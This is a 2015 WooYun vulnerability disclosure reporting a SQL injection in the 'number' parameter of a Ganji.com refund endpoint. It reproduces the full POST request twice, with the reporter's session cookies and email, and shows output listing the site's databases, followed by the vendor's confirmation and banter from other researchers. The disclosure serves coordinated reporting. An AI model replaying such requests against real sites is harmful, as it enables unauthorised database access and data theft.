赶集网主站SQL注射漏洞一枚(数据轻松跑出)

漏洞概要

缺陷编号:WooYun-2015-0128547

漏洞标题:赶集网主站SQL注射漏洞一枚(数据轻松跑出)

相关厂商:赶集网

漏洞作者:沦沦

提交时间:2015-07-23 09:18

公开时间:2015-09-06 09:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-23: 厂商已经确认,细节仅向厂商公开
2015-08-02: 细节向核心白帽子及相关领域专家公开
2015-08-12: 细节向普通白帽子公开
2015-08-22: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述:

RT

详细说明:

POST/vip/assure/index.php?source=refund&act=refund HTTP/1.1Host: www.ganji.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.ganji.com/vip/assure/index.php?source=refund&act=refundCookie: td_cookie=255226173; statistics_clientid=me; td_cookie=255190294; __utma=32156897.2080534857.1436508613.1437386074.1437610926.3; __utmz=32156897.1437610926.3.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; ganji_uuid=6278320008831332031972; sscode=CXXaPwCQLZ1dYb9tCXHXpeWH; GanjiUserName=testper1sh; GanjiUserInfo=%7B%22user_id%22%3A498598084%2C%22email%22%3A%2212379183298%40qq.com%22%2C%22username%22%3A%22testper1sh%22%2C%22user_name%22%3A%22testper1sh%22%2C%22nickname%22%3A%22%22%7D; bizs=%5B201%5D; supercookie=AQx4AGx4ZQt0WQNkAwDkMwExZJWuZ2EuAwD5LmqvMwOyAmyyLGOuLGAvBGuxLwH2Zwx%3D; uc_index_last_panel=addLandmark; JY_users=true; ganji_xuuid=a1fcacf5-a5bb-4a69-94a7-42ebe48ec575.1436508763111; GanjiEmail=12379183298%40qq.com; last_name=testper1sh; citydomain=su; lg=1; _gl_tracker=%7B%22ca_source%22%3A%22www.baidu.com%22%2C%22ca_name%22%3A%22-%22%2C%22ca_kw%22%3A%22-%22%2C%22ca_id%22%3A%22-%22%2C%22ca_s%22%3A%22seo_baidu%22%2C%22ca_n%22%3A%22-%22%2C%22ca_i%22%3A%22-%22%2C%22sid%22%3A30125600103%7D; __utmb=32156897.48.10.1437610926; __utmc=32156897; _fli_add_f=1; GANJISESSID=9f7cc5e0e1eb58a86105d26863e7fb4e; nTalk_CACHE_DATA={uid:kf_10111_ISME9754_498598084}; NTKF_T2D_CLIENTID=guest585040C7-F11A-6326-C883-136E5C423F93; __utmt=1X-Forwarded-For: 8.8.8.8Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 42number=11111&create_at=1&abnormal_status=1number参数没进行过滤

available databases [5]:[*] ganji_secondmarket[*] information_schema[*] mysql[*] percona[*] test

漏洞证明:

POST /vip/assure/index.php?source=refund&act=refund HTTP/1.1Host: www.ganji.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.ganji.com/vip/assure/index.php?source=refund&act=refundCookie: td_cookie=255226173; statistics_clientid=me; td_cookie=255190294; __utma=32156897.2080534857.1436508613.1437386074.1437610926.3; __utmz=32156897.1437610926.3.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; ganji_uuid=6278320008831332031972; sscode=CXXaPwCQLZ1dYb9tCXHXpeWH; GanjiUserName=testper1sh; GanjiUserInfo=%7B%22user_id%22%3A498598084%2C%22email%22%3A%2212379183298%40qq.com%22%2C%22username%22%3A%22testper1sh%22%2C%22user_name%22%3A%22testper1sh%22%2C%22nickname%22%3A%22%22%7D; bizs=%5B201%5D; supercookie=AQx4AGx4ZQt0WQNkAwDkMwExZJWuZ2EuAwD5LmqvMwOyAmyyLGOuLGAvBGuxLwH2Zwx%3D; uc_index_last_panel=addLandmark; JY_users=true; ganji_xuuid=a1fcacf5-a5bb-4a69-94a7-42ebe48ec575.1436508763111; GanjiEmail=12379183298%40qq.com; last_name=testper1sh; citydomain=su; lg=1; _gl_tracker=%7B%22ca_source%22%3A%22www.baidu.com%22%2C%22ca_name%22%3A%22-%22%2C%22ca_kw%22%3A%22-%22%2C%22ca_id%22%3A%22-%22%2C%22ca_s%22%3A%22seo_baidu%22%2C%22ca_n%22%3A%22-%22%2C%22ca_i%22%3A%22-%22%2C%22sid%22%3A30125600103%7D; __utmb=32156897.48.10.1437610926; __utmc=32156897; _fli_add_f=1; GANJISESSID=9f7cc5e0e1eb58a86105d26863e7fb4e; nTalk_CACHE_DATA={uid:kf_10111_ISME9754_498598084}; NTKF_T2D_CLIENTID=guest585040C7-F11A-6326-C883-136E5C423F93; __utmt=1X-Forwarded-For: 8.8.8.8Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 42number=11111&create_at=1&abnormal_status=1number参数没进行过滤

available databases [5]:[*] ganji_secondmarket[*] information_schema[*] mysql[*] percona[*] test

修复方案:

过滤,能送个礼物吗

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-2309:44

厂商回复:

我们穷,给你个高rank,拿wb找剑心要礼物吧

最新状态:

暂无

评价

  1. 2010-01-01 00:00 DloveJ 白帽子 | Rank:731 漏洞数:64)

    主站!

  2. 2010-01-01 00:00 黑色的屌丝 白帽子 | Rank:23 漏洞数:2)

    1楼

  3. 2010-01-01 00:00 PgHook 白帽子 | Rank:689 漏洞数:69)

    主站,屌屌的。

  4. 2010-01-01 00:00 专业种田 白帽子 | Rank:1371 漏洞数:151)

    主站,屌屌的。

  5. 2010-01-01 00:00 _Thorns 白帽子 | Rank:796 漏洞数:60)

    主站,屌屌的。大哥吃的啥药,卖我点。

  6. 2010-01-01 00:00 px1624 白帽子 | Rank:963 漏洞数:126)

    你这么叼,小心x牛k你!

  7. 2010-01-01 00:00 沦沦 白帽子 | Rank:475 漏洞数:62)

    @px1624 已吓跑

  8. 2010-01-01 00:00 小川 白帽子 | Rank:1367 漏洞数:158)

    ヾ(。`Д´。)?

  9. 2010-01-01 00:00 有归于无 白帽子 | Rank:49 漏洞数:5)

    主站!

  10. 2010-01-01 00:00 泳少 白帽子 | Rank:158 漏洞数:20)

    牛X

  11. 2010-01-01 00:00 xsjswt 白帽子 | Rank:146 漏洞数:38)

    你这么屌,小心我k你

  12. 2010-01-01 00:00 路人甲 白帽子 | Rank:31 漏洞数:4)

    你这么屌,小心我k你

  13. 2010-01-01 00:00 剑心 白帽子 | Rank:0 漏洞数:0)

    你这么屌,小心我k你

  14. 2010-01-01 00:00 在这光滑的地上摩擦 白帽子 | Rank:0 漏洞数:0)

    你这么屌,小心我k你

  15. 2010-01-01 00:00 http://www.wooyun.org/corps/汽车之家 白帽子 | Rank:0 漏洞数:0)

    hi,伦伦^.^

  16. 2010-01-01 00:00 紫霞仙子 白帽子 | Rank:885 漏洞数:70)

    伦伦,这么屌,下次见了请我吃饭啊!

  17. 2010-01-01 00:00 沦沦 白帽子 | Rank:475 漏洞数:62)

    @紫霞仙子 好的

  18. 2010-01-01 00:00 _Thorns 白帽子 | Rank:796 漏洞数:60)

    伦伦,这么屌,下次见了请我吃饭啊!

  19. 2010-01-01 00:00 xss_art 白帽子 | Rank:8 漏洞数:1)

    关注。。。

  20. 2010-01-01 00:00 M4sk 白帽子 | Rank:783 漏洞数:96)

    伦伦,这么屌,下次见了请我吃饭啊!

  21. 2010-01-01 00:00 沦沦 白帽子 | Rank:475 漏洞数:62)

    @M4sk 哈哈,过来玩呀

  22. 2010-01-01 00:00 土夫子 白帽子 | Rank:348 漏洞数:38)

    我们穷,给你个高rank,拿wb找剑心要礼物吧

  23. 2010-01-01 00:00 坏男孩-A_A 白帽子 | Rank:0 漏洞数:0)

    我们穷,给你个高rank,拿wb找剑心要礼物吧

  24. 2010-01-01 00:00 路人毛 白帽子 | Rank:28 漏洞数:3)

    @剑心 厂商坑你!哈哈哈

  25. 2010-01-01 00:00 辛巴 白帽子 | Rank:57 漏洞数:5)

    我们穷,给你个高rank,拿wb找剑心要礼物吧

  26. 2010-01-01 00:00 BeenQuiver 白帽子 | Rank:50 漏洞数:6)

    我们穷,给你个高rank,拿wb找剑心要礼物吧